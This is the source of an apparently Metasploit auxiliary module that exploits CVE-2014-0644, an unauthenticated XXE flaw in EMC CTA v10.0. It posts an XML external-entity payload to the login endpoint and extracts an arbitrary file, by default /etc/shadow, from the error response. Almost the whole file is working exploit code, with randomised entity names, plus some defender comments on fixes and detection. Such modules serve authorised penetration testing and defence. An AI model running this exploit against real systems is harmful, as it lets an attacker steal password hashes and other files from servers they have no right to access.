rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/gather/emc_cta_xxe.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary module for CVE-2014-0644 (EMC CTA v10.0).
#
# It sends one unauthenticated POST to <TARGETURI>/api/login with an XML body
# that declares an external entity pointing at a local file, then reads the
# file contents back out of the error text in the response.
#
# Defender notes, derived from what this module sends and parses:
# * Root cause is an XML parser on the login endpoint that resolves external
#   entities. The durable fix is to disable DTD / external-entity processing
#   in that parser, or apply the vendor fix for the CVE listed in 'References'.
# * The DOCTYPE, ELEMENT and ENTITY names are random six-letter strings on
#   every run, so detection should key on structure (a `<!DOCTYPE` or
#   `<!ENTITY ... SYSTEM` declaration in a request body sent to api/login)
#   rather than on fixed names.
# * The data leaves the server inside an error message, so responses from the
#   login endpoint that contain `For input string:` followed by file-like
#   content are a useful response-side indicator.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and the user-settable options.
  #
  # @param info [Hash] metadata handed in by the framework; merged with this
  #   module's own metadata through update_info
  def initialize(info = {})
    module_info = update_info(
      info,
      'Name' => 'EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read',
      'Description' => %q{
        EMC CTA v10.0 is susceptible to an unauthenticated XXE attack
        that allows an attacker to read arbitrary files from the file system
        with the permissions of the root user.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Brandon Perry <bperry.volatile[at]gmail.com>' # metasploit module
      ],
      'References' => [
        ['CVE', '2014-0644'],
        ['EDB', '32623']
      ],
      'DisclosureDate' => '2014-03-31',
      # NOTE(review): all three entries are still the UNKNOWN_* placeholders,
      # so the metadata does not tell an operator what traces a run leaves on
      # the target or whether it can affect service stability.
      'Notes' => {
        'Reliability' => UNKNOWN_RELIABILITY,
        'Stability' => UNKNOWN_STABILITY,
        'SideEffects' => UNKNOWN_SIDE_EFFECTS
      }
    )
    super(module_info)

    module_options = [
      Opt::RPORT(443),
      OptBool.new('SSL', [true, 'Use SSL', true]),
      OptString.new('TARGETURI', [true, "Base directory path", '/']),
      # The default targets the password-hash file, so the stored loot must be
      # handled as sensitive engagement data.
      OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"])
    ]
    register_options(module_options)
  end

  # Sends the XXE request, extracts the leaked file from the response body and
  # stores it as loot.
  #
  # Aborts through fail_with(Failure::UnexpectedReply, ...) when there is no
  # response or no body, or when the expected error text is missing from it.
  #
  # @return [void]
  def run
    # Fresh random identifiers per run; see the class comment for what that
    # means for signature-based detection.
    doctype_name = Rex::Text.rand_text_alpha(6)
    element_name = Rex::Text.rand_text_alpha(6)
    entity_name = Rex::Text.rand_text_alpha(6)
    remote_path = datastore['FILEPATH']

    # The external entity is expanded inside <Password>; the module relies on
    # the server echoing that value back in its error message.
    xml_body = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE #{doctype_name} [
<!ELEMENT #{element_name} ANY >
<!ENTITY #{entity_name} SYSTEM "file://#{remote_path}" >]>
<Request>
<Username>root</Username>
<Password>&#{entity_name};</Password>
</Request>
}

    request_opts = {
      'uri' => normalize_uri(target_uri.path, 'api', 'login'),
      'method' => 'POST',
      'data' => xml_body
    }
    response = send_request_cgi(request_opts)

    unless response && response.body
      fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way")
    end

    # Greedy capture with /m: spans newlines and runs up to the LAST double
    # quote in the body, so multi-line files are kept whole.
    leak = /For input string: "(.*)"/m.match(response.body)

    # A successful match of this one-group pattern always has two elements;
    # the length test is kept as a defensive check.
    if leak.nil? || leak.length < 2
      fail_with(Failure::UnexpectedReply, "File was unretrievable. Was it a binary file?")
    end

    contents = leak[1]

    # The loot entry records the target host and the remote path next to the
    # contents, which keeps the evidence attributable in the workspace.
    loot_path = store_loot('emc.file', 'text/plain', datastore['RHOST'], contents, remote_path)

    print_good("File saved to: " + loot_path)
  end
end